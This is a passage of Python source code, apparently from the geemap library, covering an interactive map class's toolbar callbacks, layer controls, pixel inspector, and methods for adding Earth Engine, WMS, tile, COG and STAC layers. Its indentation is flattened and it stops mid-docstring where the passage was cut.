self.plot_dropdown_control = plot_dropdown_control
self.add_control(plot_dropdown_control)
if self.draw_control in self.controls:
self.remove_control(self.draw_control)
self.add_control(self.draw_control_lite)
elif tool_name == "open_data":
from .toolbar import open_data_widget
open_data_widget(self)
elif tool_name == "convert_js":
from .toolbar import convert_js2py
convert_js2py(self)
elif tool_name == "whitebox":
import whiteboxgui.whiteboxgui as wbt
tools_dict = wbt.get_wbt_dict()
wbt_toolbox = wbt.build_toolbox(
tools_dict, max_width="800px", max_height="500px"
)
wbt_control = ipyleaflet.WidgetControl(
widget=wbt_toolbox, position="bottomright"
)
self.whitebox = wbt_control
self.add_control(wbt_control)
elif tool_name == "geetoolbox":
from .toolbar import build_toolbox, get_tools_dict
tools_dict = get_tools_dict()
gee_toolbox = build_toolbox(
tools_dict, max_width="800px", max_height="500px"
)
geetoolbox_control = ipyleaflet.WidgetControl(
widget=gee_toolbox, position="bottomright"
)
self.geetoolbox = geetoolbox_control
self.add_control(geetoolbox_control)
elif tool_name == "basemap":
from .toolbar import change_basemap
change_basemap(self)
elif tool_name == "timelapse":
from .toolbar import timelapse
timelapse(self)
self.toolbar_reset()
elif tool_name == "timeslider":
from .toolbar import time_slider
time_slider(self)
self.toolbar_reset()
elif tool_name == "draw":
from .toolbar import collect_samples
self.training_ctrl = None
collect_samples(self)
elif tool_name == "transect":
from .toolbar import plot_transect
plot_transect(self)
elif tool_name == "sankee":
from .toolbar import sankee_gui
sankee_gui(self)
elif tool_name == "planet":
from .toolbar import split_basemaps
split_basemaps(self, layers_dict=planet_tiles())
self.toolbar_reset()
elif tool_name == "help":
import webbrowser
webbrowser.open_new_tab("https://geemap.org")
current_tool.value = False
else:
tool = change["owner"]
tool_name = tools[tool.icon]["name"]
if tool_name == "to_image":
tool_output.clear_output()
save_map_widget.children = [save_type, file_chooser]
if tool_output_control in self.controls:
self.remove_control(tool_output_control)
if tool_name == "inspector":
inspector_output.clear_output()
self.inspector_checked = False
if inspector_output_control in self.controls:
self.remove_control(inspector_output_control)
elif tool_name == "plotting":
self.plot_checked = False
plot_dropdown_widget = self.plot_dropdown_widget
plot_dropdown_control = self.plot_dropdown_control
if plot_dropdown_control in self.controls:
self.remove_control(plot_dropdown_control)
del plot_dropdown_widget
del plot_dropdown_control
if self.plot_control in self.controls:
plot_control = self.plot_control
plot_widget = self.plot_widget
self.remove_control(plot_control)
self.plot_control = None
self.plot_widget = None
del plot_control
del plot_widget
if (
self.plot_marker_cluster is not None
and self.plot_marker_cluster in self.layers
):
self.remove_layer(self.plot_marker_cluster)
if self.draw_control_lite in self.controls:
self.remove_control(self.draw_control_lite)
self.add_control(self.draw_control)
elif tool_name == "whitebox":
if self.whitebox is not None and self.whitebox in self.controls:
self.remove_control(self.whitebox)
elif tool_name == "convert_js":
if (
self.convert_ctrl is not None
and self.convert_ctrl in self.controls
):
self.remove_control(self.convert_ctrl)
for tool in toolbar_grid.children:
tool.observe(tool_callback, "value")
toolbar_button = widgets.ToggleButton(
value=False,
tooltip="Toolbar",
icon="wrench",
layout=widgets.Layout(
width="28px", height="28px", padding="0px 0px 0px 4px"
),
)
self.toolbar_button = toolbar_button
layers_button = widgets.ToggleButton(
value=False,
tooltip="Layers",
icon="server",
layout=widgets.Layout(height="28px", width="72px"),
)
toolbar_widget = widgets.VBox()
toolbar_widget.children = [toolbar_button]
toolbar_header = widgets.HBox()
toolbar_header.children = [layers_button, toolbar_button]
toolbar_footer = widgets.VBox()
toolbar_footer.children = [toolbar_grid]
toolbar_event = ipyevents.Event(
source=toolbar_widget, watched_events=["mouseenter", "mouseleave"]
)
def handle_toolbar_event(event):
if event["type"] == "mouseenter":
toolbar_widget.children = [toolbar_header, toolbar_footer]
elif event["type"] == "mouseleave":
if not toolbar_button.value:
toolbar_widget.children = [toolbar_button]
toolbar_button.value = False
layers_button.value = False
toolbar_event.on_dom_event(handle_toolbar_event)
def toolbar_btn_click(change):
if change["new"]:
layers_button.value = False
toolbar_widget.children = [toolbar_header, toolbar_footer]
else:
if not layers_button.value:
toolbar_widget.children = [toolbar_button]
toolbar_button.observe(toolbar_btn_click, "value")
def layers_btn_click(change):
if change["new"]:
layers_hbox = []
all_layers_chk = widgets.Checkbox(
value=False,
description="All layers on/off",
indent=False,
layout=widgets.Layout(height="18px", padding="0px 8px 25px 8px"),
)
all_layers_chk.layout.width = "30ex"
layers_hbox.append(all_layers_chk)
def all_layers_chk_changed(change):
if change["new"]:
for layer in self.layers:
layer.visible = True
else:
for layer in self.layers:
layer.visible = False
all_layers_chk.observe(all_layers_chk_changed, "value")
layers = [
lyr
for lyr in self.layers[1:]
if (
isinstance(lyr, ipyleaflet.TileLayer)
or isinstance(lyr, ipyleaflet.WMSLayer)
)
]
# if the layers contain unsupported layers (e.g., GeoJSON, GeoData), adds the ipyleaflet built-in LayerControl
if len(layers) < (len(self.layers) - 1):
if self.layer_control is None:
layer_control = ipyleaflet.LayersControl(position="topright")
self.layer_control = layer_control
if self.layer_control not in self.controls:
self.add_control(self.layer_control)
# for non-TileLayer, use layer.style={'opacity':0, 'fillOpacity': 0} to turn layer off.
for layer in layers:
layer_chk = widgets.Checkbox(
value=layer.visible,
description=layer.name,
indent=False,
layout=widgets.Layout(height="18px"),
)
layer_chk.layout.width = "25ex"
layer_opacity = widgets.FloatSlider(
value=layer.opacity,
min=0,
max=1,
step=0.01,
readout=False,
layout=widgets.Layout(width="80px"),
)
layer_settings = widgets.ToggleButton(
icon="gear",
tooltip=layer.name,
layout=widgets.Layout(
width="25px", height="25px", padding="0px 0px 0px 5px"
),
)
def layer_vis_on_click(change):
if change["new"]:
layer_name = change["owner"].tooltip
# if layer_name in self.ee_raster_layer_names:
if layer_name in self.ee_layer_names:
layer_dict = self.ee_layer_dict[layer_name]
if self.vis_widget is not None:
self.vis_widget = None
self.vis_widget = self.create_vis_widget(layer_dict)
if self.vis_control in self.controls:
self.remove_control(self.vis_control)
self.vis_control = None
vis_control = ipyleaflet.WidgetControl(
widget=self.vis_widget, position="topright"
)
self.add_control((vis_control))
self.vis_control = vis_control
else:
if self.vis_widget is not None:
self.vis_widget = None
if self.vis_control is not None:
if self.vis_control in self.controls:
self.remove_control(self.vis_control)
self.vis_control = None
change["owner"].value = False
layer_settings.observe(layer_vis_on_click, "value")
def layer_chk_changed(change):
layer_name = change["owner"].description
if layer_name in self.ee_layer_names:
if change["new"]:
if "legend" in self.ee_layer_dict[layer_name].keys():
legend = self.ee_layer_dict[layer_name]["legend"]
if legend not in self.controls:
self.add_control(legend)
if "colorbar" in self.ee_layer_dict[layer_name].keys():
colorbar = self.ee_layer_dict[layer_name][
"colorbar"
]
if colorbar not in self.controls:
self.add_control(colorbar)
else:
if "legend" in self.ee_layer_dict[layer_name].keys():
legend = self.ee_layer_dict[layer_name]["legend"]
if legend in self.controls:
self.remove_control(legend)
if "colorbar" in self.ee_layer_dict[layer_name].keys():
colorbar = self.ee_layer_dict[layer_name][
"colorbar"
]
if colorbar in self.controls:
self.remove_control(colorbar)
layer_chk.observe(layer_chk_changed, "value")
widgets.jslink((layer_chk, "value"), (layer, "visible"))
widgets.jsdlink((layer_opacity, "value"), (layer, "opacity"))
hbox = widgets.HBox(
[layer_chk, layer_settings, layer_opacity],
layout=widgets.Layout(padding="0px 8px 0px 8px"),
)
layers_hbox.append(hbox)
toolbar_footer.children = layers_hbox
toolbar_button.value = False
else:
toolbar_footer.children = [toolbar_grid]
layers_button.observe(layers_btn_click, "value")
toolbar_control = ipyleaflet.WidgetControl(
widget=toolbar_widget, position="topright"
)
if kwargs.get("toolbar_ctrl"):
self.add_control(toolbar_control)
tool_output_control = ipyleaflet.WidgetControl(
widget=tool_output, position="topright"
)
# self.add_control(tool_output_control)
def handle_interaction(**kwargs):
latlon = kwargs.get("coordinates")
if kwargs.get("type") == "click" and self.inspector_checked:
self.default_style = {"cursor": "wait"}
if inspector_output_control not in self.controls:
self.add_control(inspector_output_control)
sample_scale = self.getScale()
layers = self.ee_layers
with inspector_output:
inspector_output.clear_output(wait=True)
print(
f"Point ({latlon[1]:.4f}, {latlon[0]:.4f}) at {int(self.get_scale())}m/px"
)
xy = ee.Geometry.Point(latlon[::-1])
for index, ee_object in enumerate(layers):
layer_names = self.ee_layer_names
layer_name = layer_names[index]
object_type = ee_object.__class__.__name__
if not self.ee_layer_dict[layer_name]["ee_layer"].visible:
continue
try:
if isinstance(ee_object, ee.ImageCollection):
ee_object = ee_object.mosaic()
elif (
isinstance(ee_object, ee.geometry.Geometry)
or isinstance(ee_object, ee.feature.Feature)
or isinstance(
ee_object,
ee.featurecollection.FeatureCollection,
)
):
ee_object = ee.FeatureCollection(ee_object)
if isinstance(ee_object, ee.Image):
item = ee_object.reduceRegion(
ee.Reducer.first(), xy, sample_scale
).getInfo()
b_name = "band"
if len(item) > 1:
b_name = "bands"
print(
"{}: {} ({} {})".format(
layer_name,
object_type,
len(item),
b_name,
)
)
keys = item.keys()
for key in keys:
print(f" {key}: {item[key]}")
elif isinstance(ee_object, ee.FeatureCollection):
# Check geometry type
geom_type = (
ee.Feature(ee_object.first()).geometry().type()
)
lat, lon = latlon
delta = 0.005
bbox = ee.Geometry.BBox(
lon - delta,
lat - delta,
lon + delta,
lat + delta,
)
# Create a bounding box to filter points
xy = ee.Algorithms.If(
geom_type.compareTo(ee.String("Point")),
xy,
bbox,
)
filtered = ee_object.filterBounds(xy)
size = filtered.size().getInfo()
if size > 0:
first = filtered.first()
props = first.toDictionary().getInfo()
b_name = "property"
if len(props) > 1:
b_name = "properties"
print(
f"{layer_name}: Feature ({len(props)} {b_name})"
)
keys = props.keys()
for key in keys:
print(f" {key}: {props[key]}")
except Exception as e:
print(e)
self.default_style = {"cursor": "crosshair"}
if (
kwargs.get("type") == "click"
and self.plot_checked
and len(self.ee_raster_layers) > 0
):
plot_layer_name = self.plot_dropdown_widget.value
layer_names = self.ee_raster_layer_names
layers = self.ee_raster_layers
index = layer_names.index(plot_layer_name)
ee_object = layers[index]
if isinstance(ee_object, ee.ImageCollection):
ee_object = ee_object.mosaic()
try:
self.default_style = {"cursor": "wait"}
plot_options = self.plot_options
sample_scale = self.getScale()
if "sample_scale" in plot_options.keys() and (
plot_options["sample_scale"] is not None
):
sample_scale = plot_options["sample_scale"]
if "title" not in plot_options.keys():
plot_options["title"] = plot_layer_name
if ("add_marker_cluster" in plot_options.keys()) and plot_options[
"add_marker_cluster"
]:
plot_coordinates = self.plot_coordinates
markers = self.plot_markers
marker_cluster = self.plot_marker_cluster
plot_coordinates.append(latlon)
self.plot_last_click = latlon
self.plot_all_clicks = plot_coordinates
markers.append(ipyleaflet.Marker(location=latlon))
marker_cluster.markers = markers
self.plot_marker_cluster = marker_cluster
band_names = ee_object.bandNames().getInfo()
if any(len(name) > 3 for name in band_names):
band_names = list(range(1, len(band_names) + 1))
self.chart_labels = band_names
if self.roi_end:
if self.roi_reducer_scale is None:
scale = ee_object.select(0).projection().nominalScale()
else:
scale = self.roi_reducer_scale
dict_values_tmp = ee_object.reduceRegion(
reducer=self.roi_reducer,
geometry=self.user_roi,
scale=scale,
bestEffort=True,
).getInfo()
b_names = ee_object.bandNames().getInfo()
dict_values = dict(
zip(b_names, [dict_values_tmp[b] for b in b_names])
)
self.chart_points.append(
self.user_roi.centroid(1).coordinates().getInfo()
)
else:
xy = ee.Geometry.Point(latlon[::-1])
dict_values_tmp = (
ee_object.sample(xy, scale=sample_scale)
.first()
.toDictionary()
.getInfo()
)
b_names = ee_object.bandNames().getInfo()
dict_values = dict(
zip(b_names, [dict_values_tmp[b] for b in b_names])
)
self.chart_points.append(xy.coordinates().getInfo())
band_values = list(dict_values.values())
self.chart_values.append(band_values)
self.plot(band_names, band_values, **plot_options)
if plot_options["title"] == plot_layer_name:
del plot_options["title"]
self.default_style = {"cursor": "crosshair"}
self.roi_end = False
except Exception as e:
if self.plot_widget is not None:
with self.plot_widget:
self.plot_widget.clear_output()
print("No data for the clicked location.")
else:
print(e)
self.default_style = {"cursor": "crosshair"}
self.roi_end = False
self.on_interaction(handle_interaction)
def set_options(self, mapTypeId="HYBRID", styles=None, types=None):
"""Adds Google basemap and controls to the ipyleaflet map.
Args:
mapTypeId (str, optional): A mapTypeId to set the basemap to. Can be one of "ROADMAP", "SATELLITE", "HYBRID" or "TERRAIN" to select one of the standard Google Maps API map types. Defaults to 'HYBRID'.
styles (object, optional): A dictionary of custom MapTypeStyle objects keyed with a name that will appear in the map's Map Type Controls. Defaults to None.
types (list, optional): A list of mapTypeIds to make available. If omitted, but opt_styles is specified, appends all of the style keys to the standard Google Maps API map types.. Defaults to None.
"""
self.clear_layers()
self.clear_controls()
self.scroll_wheel_zoom = True
self.add_control(ipyleaflet.ZoomControl(position="topleft"))
self.add_control(ipyleaflet.LayersControl(position="topright"))
self.add_control(ipyleaflet.ScaleControl(position="bottomleft"))
self.add_control(ipyleaflet.FullScreenControl())
self.add_control(ipyleaflet.DrawControl())
measure = ipyleaflet.MeasureControl(
position="bottomleft",
active_color="orange",
primary_length_unit="kilometers",
)
self.add_control(measure)
try:
self.add_layer(basemap_tiles[mapTypeId])
except Exception:
raise ValueError(
'Google basemaps can only be one of "ROADMAP", "SATELLITE", "HYBRID" or "TERRAIN".'
)
setOptions = set_options
def add_ee_layer(
self, ee_object, vis_params={}, name=None, shown=True, opacity=1.0
):
"""Adds a given EE object to the map as a layer.
Args:
ee_object (Collection|Feature|Image|MapId): The object to add to the map.
vis_params (dict, optional): The visualization parameters. Defaults to {}.
name (str, optional): The name of the layer. Defaults to 'Layer N'.
shown (bool, optional): A flag indicating whether the layer should be on by default. Defaults to True.
opacity (float, optional): The layer's opacity represented as a number between 0 and 1. Defaults to 1.
"""
from box import Box
image = None
if name is None:
layer_count = len(self.layers)
name = "Layer " + str(layer_count + 1)
if (
not isinstance(ee_object, ee.Image)
and not isinstance(ee_object, ee.ImageCollection)
and not isinstance(ee_object, ee.FeatureCollection)
and not isinstance(ee_object, ee.Feature)
and not isinstance(ee_object, ee.Geometry)
):
err_str = "\n\nThe image argument in 'addLayer' function must be an instance of one of ee.Image, ee.Geometry, ee.Feature or ee.FeatureCollection."
raise AttributeError(err_str)
if (
isinstance(ee_object, ee.geometry.Geometry)
or isinstance(ee_object, ee.feature.Feature)
or isinstance(ee_object, ee.featurecollection.FeatureCollection)
):
features = ee.FeatureCollection(ee_object)
width = 2
if "width" in vis_params:
width = vis_params["width"]
color = "000000"
if "color" in vis_params:
color = vis_params["color"]
image_fill = features.style(**{"fillColor": color}).updateMask(
ee.Image.constant(0.5)
)
image_outline = features.style(
**{"color": color, "fillColor": "00000000", "width": width}
)
image = image_fill.blend(image_outline)
elif isinstance(ee_object, ee.image.Image):
image = ee_object
elif isinstance(ee_object, ee.imagecollection.ImageCollection):
image = ee_object.mosaic()
if "palette" in vis_params and isinstance(vis_params["palette"], Box):
try:
vis_params["palette"] = vis_params["palette"]["default"]
except Exception as e:
print("The provided palette is invalid.")
raise Exception(e)
map_id_dict = ee.Image(image).getMapId(vis_params)
tile_layer = ipyleaflet.TileLayer(
url=map_id_dict["tile_fetcher"].url_format,
attribution="Google Earth Engine",
name=name,
opacity=opacity,
visible=shown,
)
layer = self.find_layer(name=name)
if layer is not None:
existing_object = self.ee_layer_dict[name]["ee_object"]
if isinstance(existing_object, ee.Image) or isinstance(
existing_object, ee.ImageCollection
):
self.ee_raster_layers.remove(existing_object)
self.ee_raster_layer_names.remove(name)
if self.plot_dropdown_widget is not None:
self.plot_dropdown_widget.options = list(self.ee_raster_layer_names)
elif (
isinstance(ee_object, ee.Geometry)
or isinstance(ee_object, ee.Feature)
or isinstance(ee_object, ee.FeatureCollection)
):
self.ee_vector_layers.remove(existing_object)
self.ee_vector_layer_names.remove(name)
self.ee_layers.remove(existing_object)
self.ee_layer_names.remove(name)
self.remove_layer(layer)
self.ee_layers.append(ee_object)
if name not in self.ee_layer_names:
self.ee_layer_names.append(name)
self.ee_layer_dict[name] = {
"ee_object": ee_object,
"ee_layer": tile_layer,
"vis_params": vis_params,
}
self.add_layer(tile_layer)
self.last_ee_layer = self.ee_layer_dict[name]
self.last_ee_data = self.ee_layer_dict[name]["ee_object"]
if isinstance(ee_object, ee.Image) or isinstance(ee_object, ee.ImageCollection):
self.ee_raster_layers.append(ee_object)
self.ee_raster_layer_names.append(name)
if self.plot_dropdown_widget is not None:
self.plot_dropdown_widget.options = list(self.ee_raster_layer_names)
elif (
isinstance(ee_object, ee.Geometry)
or isinstance(ee_object, ee.Feature)
or isinstance(ee_object, ee.FeatureCollection)
):
self.ee_vector_layers.append(ee_object)
self.ee_vector_layer_names.append(name)
addLayer = add_ee_layer
def remove_ee_layer(self, name):
"""Removes an Earth Engine layer.
Args:
name (str): The name of the Earth Engine layer to remove.
"""
if name in self.ee_layer_dict:
ee_object = self.ee_layer_dict[name]["ee_object"]
ee_layer = self.ee_layer_dict[name]["ee_layer"]
if name in self.ee_raster_layer_names:
self.ee_raster_layer_names.remove(name)
self.ee_raster_layers.remove(ee_object)
elif name in self.ee_vector_layer_names:
self.ee_vector_layer_names.remove(name)
self.ee_vector_layers.remove(ee_object)
self.ee_layers.remove(ee_object)
self.ee_layer_names.remove(name)
if ee_layer in self.layers:
self.remove_layer(ee_layer)
def draw_layer_on_top(self):
"""Move user-drawn feature layer to the top of all layers."""
draw_layer_index = self.find_layer_index(name="Drawn Features")
if draw_layer_index > -1 and draw_layer_index < (len(self.layers) - 1):
layers = list(self.layers)
layers = (
layers[0:draw_layer_index]
+ layers[(draw_layer_index + 1) :]
+ [layers[draw_layer_index]]
)
self.layers = layers
def set_center(self, lon, lat, zoom=None):
"""Centers the map view at a given coordinates with the given zoom level.
Args:
lon (float): The longitude of the center, in degrees.
lat (float): The latitude of the center, in degrees.
zoom (int, optional): The zoom level, from 1 to 24. Defaults to None.
"""
self.center = (lat, lon)
if zoom is not None:
self.zoom = zoom
setCenter = set_center
def center_object(self, ee_object, zoom=None):
"""Centers the map view on a given object.
Args:
ee_object (Element|Geometry): An Earth Engine object to center on a geometry, image or feature.
zoom (int, optional): The zoom level, from 1 to 24. Defaults to None.
"""
if zoom is None and hasattr(self, "fit_bounds"):
self.zoom_to_object(ee_object)
else:
lat = 0
lon = 0
if isinstance(ee_object, ee.geometry.Geometry):
centroid = ee_object.centroid(1)
lon, lat = centroid.getInfo()["coordinates"]
else:
try:
centroid = ee_object.geometry().centroid(1)
lon, lat = centroid.getInfo()["coordinates"]
except Exception as e:
print(e)
raise Exception(e)
self.setCenter(lon, lat, zoom)
centerObject = center_object
def zoom_to_object(self, ee_object):
"""Zoom to the full extent of an Earth Engine object.
Args:
ee_object (object): An Earth Engine object, such as Image, ImageCollection, Geometry, Feature, FeatureCollection.
Raises:
Exception: Error getting geometry.
"""
coordinates = None
if isinstance(ee_object, ee.geometry.Geometry):
bounds = ee_object.bounds()
coordinates = bounds.getInfo()["coordinates"][0]
else:
try:
bounds = ee_object.geometry().bounds()
coordinates = bounds.getInfo()["coordinates"][0]
except Exception as e:
print(e)
raise Exception(e)
if coordinates is not None:
south = coordinates[0][1]
west = coordinates[0][0]
north = coordinates[2][1]
east = coordinates[2][0]
self.fit_bounds([[south, east], [north, west]])
zoomToObject = zoom_to_object
def zoom_to_me(self, zoom=14, add_marker=True):
"""Zoom to the current device location.
Args:
zoom (int, optional): Zoom level. Defaults to 14.
add_marker (bool, optional): Whether to add a marker of the current device location. Defaults to True.
"""
lat, lon = get_current_latlon()
self.set_center(lon, lat, zoom)
if add_marker:
marker = ipyleaflet.Marker(
location=(lat, lon),
draggable=False,
name="Device location",
)
self.add_layer(marker)
def get_scale(self):
"""Returns the approximate pixel scale of the current map view, in meters.
Returns:
float: Map resolution in meters.
"""
zoom_level = self.zoom
# Reference: https://blogs.bing.com/maps/2006/02/25/map-control-zoom-levels-gt-resolution
resolution = 156543.04 * math.cos(0) / math.pow(2, zoom_level)
return resolution
getScale = get_scale
def add_basemap(self, basemap="HYBRID"):
"""Adds a basemap to the map.
Args:
basemap (str, optional): Can be one of string from ee_basemaps. Defaults to 'HYBRID'.
"""
try:
if (
basemap in basemap_tiles.keys()
and basemap_tiles[basemap] not in self.layers
):
self.add_layer(basemap_tiles[basemap])
except Exception:
raise ValueError(
"Basemap can only be one of the following:\n {}".format(
"\n ".join(basemap_tiles.keys())
)
)
def find_layer(self, name):
"""Finds layer by name
Args:
name (str): Name of the layer to find.
Returns:
object: ipyleaflet layer object.
"""
layers = self.layers
for layer in layers:
if layer.name == name:
return layer
return None
def find_layer_index(self, name):
"""Finds layer index by name
Args:
name (str): Name of the layer to find.
Returns:
int: Index of the layer with the specified name
"""
layers = self.layers
for index, layer in enumerate(layers):
if layer.name == name:
return index
return -1
def layer_opacity(self, name, value=1.0):
"""Changes layer opacity.
Args:
name (str): The name of the layer to change opacity.
value (float, optional): The opacity value to set. Defaults to 1.0.
"""
layer = self.find_layer(name)
try:
layer.opacity = value
except Exception as e:
raise Exception(e)
def add_wms_layer(
self,
url,
layers,
name=None,
attribution="",
format="image/jpeg",
transparent=False,
opacity=1.0,
shown=True,
**kwargs,
):
"""Add a WMS layer to the map.
Args:
url (str): The URL of the WMS web service.
layers (str): Comma-separated list of WMS layers to show.
name (str, optional): The layer name to use on the layer control. Defaults to None.
attribution (str, optional): The attribution of the data layer. Defaults to ''.
format (str, optional): WMS image format (use ‘image/png’ for layers with transparency). Defaults to 'image/jpeg'.
transparent (bool, optional): If True, the WMS service will return images with transparency. Defaults to False.
opacity (float, optional): The opacity of the layer. Defaults to 1.0.
shown (bool, optional): A flag indicating whether the layer should be on by default. Defaults to True.
"""
if name is None:
name = str(layers)
try:
wms_layer = ipyleaflet.WMSLayer(
url=url,
layers=layers,
name=name,
attribution=attribution,
format=format,
transparent=transparent,
opacity=opacity,
visible=shown,
**kwargs,
)
self.add_layer(wms_layer)
except Exception as e:
print("Failed to add the specified WMS TileLayer.")
raise Exception(e)
def add_tile_layer(
self,
url="https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png",
name="Untitled",
attribution="",
opacity=1.0,
shown=True,
**kwargs,
):
"""Adds a TileLayer to the map.
Args:
url (str, optional): The URL of the tile layer. Defaults to 'https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png'.
name (str, optional): The layer name to use for the layer. Defaults to 'Untitled'.
attribution (str, optional): The attribution to use. Defaults to ''.
opacity (float, optional): The opacity of the layer. Defaults to 1.
shown (bool, optional): A flag indicating whether the layer should be on by default. Defaults to True.
"""
try:
tile_layer = ipyleaflet.TileLayer(
url=url,
name=name,
attribution=attribution,
opacity=opacity,
visible=shown,
**kwargs,
)
self.add_layer(tile_layer)
except Exception as e:
print("Failed to add the specified TileLayer.")
raise Exception(e)
def add_cog_layer(
self,
url,
name="Untitled",
attribution="",
opacity=1.0,
shown=True,
titiler_endpoint="https://api.cogeo.xyz/",
**kwargs,
):
"""Adds a COG TileLayer to the map.
Args:
url (str): The URL of the COG tile layer.
name (str, optional): The layer name to use for the layer. Defaults to 'Untitled'.
attribution (str, optional): The attribution to use. Defaults to ''.
opacity (float, optional): The opacity of the layer. Defaults to 1.
shown (bool, optional): A flag indicating whether the layer should be on by default. Defaults to True.
titiler_endpoint (str, optional): Titiler endpoint. Defaults to "https://api.cogeo.xyz/".
"""
tile_url = get_cog_tile(url, titiler_endpoint, **kwargs)
center = get_cog_center(url, titiler_endpoint) # (lon, lat)
self.add_tile_layer(tile_url, name, attribution, opacity, shown)
self.set_center(lon=center[0], lat=center[1], zoom=10)
def add_cog_mosaic(
self,
links,
name="Untitled",
attribution="",
opacity=1.0,
shown=True,
titiler_endpoint="https://api.cogeo.xyz/",
username="anonymous",
overwrite=False,
show_footprints=False,
verbose=True,
**kwargs,
):
"""Add a virtual mosaic of COGs to the map.
Args:
links (list): A list of links pointing to COGs.
name (str, optional): The layer name to use for the layer. Defaults to 'Untitled'.
attribution (str, optional): The attribution to use. Defaults to ''.
opacity (float, optional): The opacity of the layer. Defaults to 1.
shown (bool, optional): A flag indicating whether the layer should be on by default. Defaults to True.
titiler_endpoint (str, optional): Titiler endpoint. Defaults to "https://api.cogeo.xyz/".
username (str, optional): The username to create mosaic using the titiler endpoint. Defaults to 'anonymous'.
overwrite (bool, optional): Whether or not to replace existing layer with the same layer name. Defaults to False.
show_footprints (bool, optional): Whether or not to show footprints of COGs. Defaults to False.
verbose (bool, optional): Whether or not to print descriptions. Defaults to True.
"""
layername = name.replace(" ", "_")
tile = get_cog_mosaic(
links,
titiler_endpoint=titiler_endpoint,
username=username,
layername=layername,
overwrite=overwrite,
verbose=verbose,
)
self.add_tile_layer(tile, name, attribution, opacity, shown)
if show_footprints:
if verbose:
print(
f"Generating footprints of {len(links)} COGs. This might take a while ..."
)
coords = []
for link in links:
coord = get_cog_bounds(link)
if coord is not None:
coords.append(coord)
fc = coords_to_geojson(coords)
geo_json = ipyleaflet.GeoJSON(
data=fc,
style={
"opacity": 1,
"dashArray": "1",
"fillOpacity": 0,
"weight": 1,
},
name="Footprints",
)
self.add_layer(geo_json)
center = get_center(fc)
if verbose:
print("The footprint layer has been added.")
else:
center = get_cog_center(links[0], titiler_endpoint)
self.set_center(center[0], center[1], zoom=6)
def add_stac_layer(
self,
url,
bands=None,
name="Untitled",
attribution="",
opacity=1.0,
shown=True,
titiler_endpoint="https://api.cogeo.xyz/",
**kwargs,
):
"""Adds a STAC TileLayer to the map.
Args:
url (str): The URL of the COG tile layer.
name (str, optional): The layer name to use for the layer. Defaults to 'Untitled'.
attribution (str, optional): The attribution to use. Defaults to ''.
opacity (float, optional): The opacity of the layer. Defaults to 1.
shown (bool, optional): A flag indicating whether the layer should be on by default. Defaults to True.
titiler_endpoint (str, optional): Titiler endpoint. Defaults to "https://api.cogeo.xyz/".
"""
tile_url = get_stac_tile(url, bands, titiler_endpoint, **kwargs)
center = get_stac_center(url, titiler_endpoint)
self.add_tile_layer(tile_url, name, attribution, opacity, shown)
self.set_center(lon=center[0], lat=center[1], zoom=10)
def add_minimap(self, zoom=5, position="bottomright"):
"""Adds a minimap (overview) to the ipyleaflet map.
Args:
zoom (int, optional): Initial map zoom level. Defaults to 5.
position (str, optional): Position of the minimap. Defaults to "bottomright".
"""
minimap = ipyleaflet.Map(
zoom_control=False,
attribution_control=False,
zoom=zoom,
center=self.center,
layers=[basemap_tiles["ROADMAP"]],
)
minimap.layout.width = "150px"
minimap.layout.height = "150px"
ipyleaflet.link((minimap, "center"), (self, "center"))
minimap_control = ipyleaflet.WidgetControl(widget=minimap, position=position)
self.add_control(minimap_control)
def marker_cluster(self):
"""Adds a marker cluster to the map and returns a list of ee.Feature, which can be accessed using Map.ee_marker_cluster.
Returns:
object: a list of ee.Feature
"""
coordinates = []
markers = []
marker_cluster = ipyleaflet.MarkerCluster(name="Marker Cluster")
self.last_click = []
self.all_clicks = []
self.ee_markers = []
self.add_layer(marker_cluster)
def handle_interaction(**kwargs):
latlon = kwargs.get("coordinates")
if kwargs.get("type") == "click":
coordinates.append(latlon)
geom = ee.Geometry.Point(latlon[1], latlon[0])
feature = ee.Feature(geom)
self.ee_markers.append(feature)
self.last_click = latlon
self.all_clicks = coordinates
markers.append(ipyleaflet.Marker(location=latlon))
marker_cluster.markers = markers
elif kwargs.get("type") == "mousemove":
pass
# cursor style: https://www.w3schools.com/cssref/pr_class_cursor.asp
self.default_style = {"cursor": "crosshair"}
self.on_interaction(handle_interaction)
def set_plot_options(
self,
add_marker_cluster=False,
sample_scale=None,
plot_type=None,
overlay=False,
position="bottomright",
min_width=None,
max_width=None,
min_height=None,
max_height=None,
**kwargs,
):
"""Sets plotting options.
Args:
add_marker_cluster (bool, optional): Whether to add a marker cluster. Defaults to False.
sample_scale (float, optional): A nominal scale in meters of the projection to sample in . Defaults to None.
plot_type (str, optional): The plot type can be one of "None", "bar", "scatter" or "hist". Defaults to None.
overlay (bool, optional): Whether to overlay plotted lines on the figure. Defaults to False.
position (str, optional): Position of the control, can be ‘bottomleft’, ‘bottomright’, ‘topleft’, or ‘topright’. Defaults to 'bottomright'.
min_width (int, optional): Min width of the widget (in pixels), if None it will respect the content size. Defaults to None.
max_width (int, optional): Max width of the widget (in pixels), if None it will respect the content size. Defaults to None.
min_height (int, optional): Min height of the widget (in pixels), if None it will respect the content size. Defaults to None.
max_height (int, optional): Max height of the widget (in pixels), if None it will respect the content size. Defaults to None.
"""
plot_options_dict = {}
plot_options_dict["add_marker_cluster"] = add_marker_cluster
plot_options_dict["sample_scale"] = sample_scale
plot_options_dict["plot_type"] = plot_type
plot_options_dict["overlay"] = overlay
plot_options_dict["position"] = position
plot_options_dict["min_width"] = min_width
plot_options_dict["max_width"] = max_width
plot_options_dict["min_height"] = min_height
plot_options_dict["max_height"] = max_height
for key in kwargs.keys():
plot_options_dict[key] = kwargs[key]
self.plot_options = plot_options_dict
if add_marker_cluster and (self.plot_marker_cluster not in self.layers):
self.add_layer(self.plot_marker_cluster)
def plot(
self,
x,
y,
plot_type=None,
overlay=False,
position="bottomright",
min_width=None,
max_width=None,
min_height=None,
max_height=None,
**kwargs,
):
"""Creates a plot based on x-array and y-array data.
Args:
x (numpy.ndarray or list): The x-coordinates of the plotted line.
y (numpy.ndarray or list): The y-coordinates of the plotted line.
plot_type (str, optional): The plot type can be one of "None", "bar", "scatter" or "hist". Defaults to None.
overlay (bool, optional): Whether to overlay plotted lines on the figure. Defaults to False.
position (str, optional): Position of the control, can be ‘bottomleft’, ‘bottomright’, ‘topleft’, or ‘topright’. Defaults to 'bottomright'.
min_width (int, optional): Min width of the widget (in pixels), if None it will respect the content size. Defaults to None.
max_width (int, optional): Max width of the widget (in pixels), if None it will respect the content size. Defaults to None.
